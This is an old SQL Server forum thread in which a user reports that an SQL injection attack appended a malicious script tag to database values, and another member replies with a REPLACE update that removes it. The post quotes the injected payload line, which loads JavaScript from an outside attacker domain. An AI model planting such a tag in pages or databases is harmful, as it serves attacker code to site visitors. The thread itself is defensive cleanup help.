Please start any new threads on our new
site at https://forums.sqlteam.com. We've got lots of great SQL Server
experts to answer whatever question you can come up with.
| Author |
Topic |
|
dd97
Starting Member
1 Post |
 Posted - 2010-11-12 : 10:42:25
|
| Hello everyone! 1st time poster here.I think my database has been compromised by the ASProx botnet. I was going through the import data wizard and all the values for the type field had this string appended to them: "<script src=http://www.bywd.ru/js.js></script>"Here is a screenshot of this: [url]http://tinyurl.com/2a7jww7[/url]So I did a few google searches and found this article: [url]http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx[/url]It was very helpful b/c it explained how it happened and how to do a better job of preventing it but I still don't really know how to rid my database of this junk. I couldn't find any rows in my tables with '%<script>%' in them. And I don't see that script reference in any of my webpages either. So maybe the attack failed or it is very well hidden. If anyone here can help me I would be very appreciative!Thanks for reading and have a great day. |
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2010-11-12 : 17:36:37
|
update table1set col1 = replace(col1, '<script src=http://www.bywd.ru/js.js></script>', '')
N 56°04'39.26"E 12°55'05.63" |
 |
|
|
|
|
|
I've been hacked (sql injection)